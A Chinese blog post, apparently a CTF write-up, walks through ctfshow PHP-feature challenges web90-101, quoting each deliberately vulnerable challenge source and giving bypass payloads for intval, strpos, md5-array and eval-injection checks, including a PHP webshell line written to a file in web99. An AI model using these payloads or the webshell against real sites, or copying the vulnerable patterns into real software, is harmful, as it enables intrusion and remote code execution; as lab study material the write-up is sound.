PHP代码审计-----以ctfshow php特性90-101为例

最新推荐文章于 2024-02-03 17:33:39 发布
最新推荐文章于 2024-02-03 17:33:39 发布
阅读量100 收藏
点赞数
文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74020399/article/details/132062405
版权

web90

 实例:<?php
echo intval(42);                      // 42
echo intval(4.2);                     // 4
echo intval('42');                    // 42
echo intval('+42');                   // 42
echo intval('-42');                   // -42
echo intval(042);                     // 34
echo intval('042');                   // 42
echo intval(1e10);                    // 1410065408
echo intval('1e10');                  // 1
echo intval(0x1A);                    // 26
echo intval(42000000);                // 42000000
echo intval(420000000000000000000);   // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8);                   // 42
echo intval('42', 8);                 // 34
echo intval(array());                 // 0
echo intval(array('foo', 'bar'));     // 1
?>

来看一下题目

 当值等于4476时便可以,intval取的是我们所输入内容开头的整数,也就是说我们传入含有字符的字符串,例如?num=4476a,那么intval(“4476c”)也等于4476。

构造pyload:num=4476c,URL栏输入既可

web91

preg_match 函数用于执行一个正则表达式匹配

^ 表示匹配文本的起始位置

/i   表示匹配大小写

/m  表示多行匹配

引入题目源码:

对其解码得:多行之内要有php,但一行之内不能有php

构造paylaod:cmd=%0aphp 

web92

看源码

类似于web90也是intval函数的考验。

构造pyload:4476e123。

原理:这样以科学计数法方式的,可以绕过第一个if判断,intval()函数如果$base为0则$var中存在字母的话遇到字母就停止读取,所以intval遇到4476e123会变成4476。 

web93

 <?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

 如源码所示过滤了a-z用不了16进制和科学计数法了,但可以用8进制

payload:010574

web94

源码:

 <?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

第一个if是强等判断(即判断类型又判断内容)

第三个if的意思   传进来的字符串必须要有0,而且是不能以0开头

而对于strpos函数来说我们可以用换行(%0a)和空格进行绕过

payload:?num=%0a010574或payload:?num=4476.0  

web95

 <?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

分析源码与94差不多多了一个点的过滤

payload:?num= 010574或payload:?num=%0a010574

web96

<?php
highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

这里的$_GET[u]是弱类型比较可以在前面加路径绕过比较,但是文件还是可以正常读取

payload:u=./flag.php或payload:u=/var/www/html/flag.php

web97

<?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

对源码分析:a要不等于b,但是md5要相等,可以用数组,直接用MD5数组返回的是相同的值这点绕过过滤。

payload:a[]=1&b[]=2

web98

<?php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>

看源码发现是三元表达式

三元表达式:

条件表达式?表达式1:表达式2
条件表达式为true时调用表达式1,为false时调用表达式2 

附上知识:

php三元运算符与if的详解

对源码解析得到:

如果有get参数那么get=$_post否则get=flag

如果get的flag变量等于flag那么get=cookie

如果get的flag变量等于flag那么get=$_SERVER

如果get的http_flag变量等于flag,那么输出 flag

法一

我们利用第一行和第四行:先让get有参数让它为真,从而拿post数据构造pyload

payload:get传参   ?1=1  或 ?2=2等随机数都可以

                post传参   HTTP_FLAG=flag

法二

我们利用get传参让它拿post数据,post传入flag=flag拿cookie数据,cookie则传入第四行的判断

payload:get传参   ?1=1   同上

                  post传参   flag=flag  (让它进入第二行的判断,拿cookie数据)

                  cookie传参  HTTP_FLAG=flag

web99

 <?php
highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

分析源码:

for循环里面的意思是取随机数1到36之间一个数,1到37之间一个数,1到38一个数,直到1到877,然后把每次拿到的随机数追加到allow数组里面

in_array判断allow数组里面是否有n参数

进行构造pyload:

get传参  n=1.php

post传参 content=<?php eval($_POST[a]);?>

web100

 看看源码:

 <?php
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}
?>

Notice: Undefined index: v1 in /var/www/html/index.php on line 17

Notice: Undefined index: v2 in /var/www/html/index.php on line 18

Notice: Undefined index: v3 in /var/www/html/index.php on line 19

分析:is_numeric检测变量是否为数字或数字字符串

v0那一行:赋值的优先级要高于and,所以不用管v2 v3是不是数字,只会把v1赋值给v0

if匹配v2里面不能有;号,v3里面要有;号。

payload:?v1=21&v2=var_dump($ctfshow)/*&v3=*/;

web101

 <?php

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

?>

看看源码与上一题相似,但过滤了/,*等,只能换一种做法

可以使用ReflectionClass类:PHP: ReflectionClass 

payload:?v1=1&v2=echo new ReflectionClass&v3=;

梅琳娜等等我
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-code-audit代码审计源码
01-02
php code audit for cms vulnerabilities / 代码审计,对一些大型cms漏洞的复现研究,更新源码和漏洞exp
php代码审计-代码执行.pdf
12-14
一些php代码审计的笔记
PHP表单传值和文件上传:深入解析数据交互与文件处理技术
qq_68163788的博客
06-30 2563
在表单传值和文件上传过程中,我们应该遵循一些通用的规范和建议,如使用POST方法传输敏感数据,对用户输入进行合理的过滤和验证,避免文件上传路径暴露等。同时,我们还应该关注性能优化和安全防护,如合理设置文件上传的大小限制和超时时间,防止文件上传被滥用和攻击。PHP表单传值和文件上传是Web开发中不可或缺的一部分。通过深入剖析相关的高级技术和最佳实践,我们可以更好地掌握数据交互和文件处理的核心原理,提升开发效率和代码质量。无论是初学者还是有经验的开发人员都要
php特性靶场web 89-103
最新发布
2301_80553405的博客
02-03 843
看代码,意思是包含了flag文件,如果get传参不为空,num赋上这个值,如果num中有0到9数字,则输出no并退出,如果把num转化为整数为真则输出flag。想要flag,要输入能转化成数字的num,但是得绕过preg_match。preg_match函数用于完成字符串正则匹配,成功返回1,否则0,但是只能处理字符串。我们可以传入数组,preg_match不能处理会报错返回false,从而绕过它。所以输入?num[]=1。
ctf.show php特性(89~110)
qq_61768489的博客
02-14 656
web91 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } 考察preg_match函数处理不了数组,错误返回0,即是我们想要的 /?num[] web92 web93 web94 web95 web.
ctfshow-web90(php特性)
m0_62094846的博客
01-13 301
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:06:11 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ include("flag.php"); highlight_file(...
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 786
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
动物园管理系统源代码-PHP与MySQL数据库.zip
06-29
动物园管理系统源代码-PHP与MySQL数据库
php-code-generator:PHP代码生成器库
04-30
PHP代码生成器 该库提供了一些通常需要用于生成PHP... composer require gossi/php-code-generator 文献资料 可从获得文档。 贡献 随意分叉并提交拉取请求(不要忘记测试),我很高兴合并。 参考 该项目是旧版库的。
详解使用php-cs-fixer格式化代码
10-14
**PHP-CS-Fixer:代码格式化的利器** 在PHP开发中,保持代码的整洁和一致性是至关重要的,因为这直接影响到代码的可读性和维护性。`php-cs-fixer` 是一个由Symfony社区开发的强大工具,它可以帮助开发者自动格式化...
CTFshow-php特性
qq_61376069的博客
01-25 513
CTFshow入门—php特性。intval()函数、强比较;preg_match正则表达式匹配;strpos() 函数;MD5值比较绕过;php三元运算符;php运算符优先级
ctfshow web入门 php特性
Sentiment的博客
04-11 5240
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 5207
CTFSHOW PHP特性做题笔记 详细学习
ctfshow (php特性篇)
qq_45766062的博客
12-01 910
web97 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_POST['a']) and isset($_POST['b'])) { if ($_POST['a'] != $_POST['b']) if (md5($_POST['a']) === md5($_POST['b'])) echo $flag; else print 'Wrong.'; } ?> php的MD5()函数不能处理数组,遇到
ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性(89-102)
weixin_28909295的博客
04-01 1031
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
ctfshow web97-100 php特性
qq_52671379的博客
03-28 533
ctfshow web97-php特性
CTFSHOW-PHP特性
Monica的博客
10-09 3602
WEB89 题目: <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 知识点: 数组绕过正则表达式
CTFshow php特性 web90
Kradress的博客
12-13 273
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:06:11 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ include("flag.php"); highlig
ctfshow—PHP特性
cosmoslin的博客
09-14 2183
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
PHP代码审计-php-hash比较缺陷
07-08
对于PHP代码审计中的php-hash比较缺陷,我可以给你一些相关的信息。在PHP中,使用"=="操作符进行字符串比较时,存在一些问题。这是因为"=="操作符在比较字符串时会进行类型转换,可能导致意外的结果。具体来说,当...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值